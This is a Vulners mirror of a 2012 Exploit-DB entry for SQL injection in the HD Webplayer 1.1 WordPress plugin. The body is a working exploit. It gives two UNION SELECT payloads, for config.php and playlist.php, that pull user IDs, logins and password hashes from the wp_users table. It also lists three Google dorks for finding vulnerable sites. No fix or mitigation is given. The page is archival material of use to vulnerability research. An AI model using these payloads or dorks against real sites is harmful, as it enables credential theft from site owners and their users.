Lucene search
K

WordPress Plugin HD Webplayer 1.1 - SQL Injection

🗓️ 29 Aug 2012 00:00:00Reported by JoinSe7enType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

WordPress HD Webplayer 1.1 SQL Injection vulnerabilit

Code
   _______                     _____ _   _ _______ _____            
  |__   __|                   |_   _| \ | |__   __|  __ \     /\    
     | | ___  __ _ _ __ ___     | | |  \| |  | |  | |__) |   /  \   
     | |/ _ \/ _` | '_ ` _ \    | | | . ` |  | |  |  _  /   / /\ \  
     | |  __/ (_| | | | | | |  _| |_| |\  |  | |  | | \ \  / ____ \ 
     |_|\___|\__,_|_| |_| |_| |_____|_| \_|  |_|  |_|  \_\/_/    \_\
                                                          - JoinSe7en


+----------------------------------------------------------------------+
|               Wordpress HD Webplayer 1.1 SQL Injection               |
|                    Author: JoinSe7en [Team INTRA]                    |
+----------------------------------------------------------------------+

# Exploit Title: Wordpress HD Webplayer 1.1 SQL Injection
# Date: 28/08/2012
# Exploit Author: JoinSe7en
# Vendor Homepage: http://www.hdwebplayer.com/
# Software Link: http://hdwebplayer.com/downloads/hdwebplayer_wordpress_1.1.zip
# Category: Web Application 0-Day
# Version: version 1.1
# Tested on: Windows 7, Backtrack 5 r3

+----------------------------------------------------------------------+
|                     Vulnerability 1 - config.php                     |
+----------------------------------------------------------------------+

# Location:

http://site.com/wp-content/plugins/hd-webplayer/config.php?id= [INJECT HERE]

# Exploit Code:

config.php?id=1+/*!UNION*/+/*!SELECT*/+1,2,3,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),5,6,7+from+wp_users //Number of columns may be different

+----------------------------------------------------------------------+
|                    Vulnerability 2 - playlist.php                    |
+----------------------------------------------------------------------+

# Location:

http://site.com/wp-content/plugins/hd-webplayer/playlist.php?videoid= [INJECT HERE]

# Exploit Code:

playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7+from+wp_users //Number of columns may be different

+----------------------------------------------------------------------+
|                             Google Dork                              |
+----------------------------------------------------------------------+

There are 3 different usefull dorks to use:

# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"

+----------------------------------------------------------------------+

Greetz to all members of Team INTRA <3

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation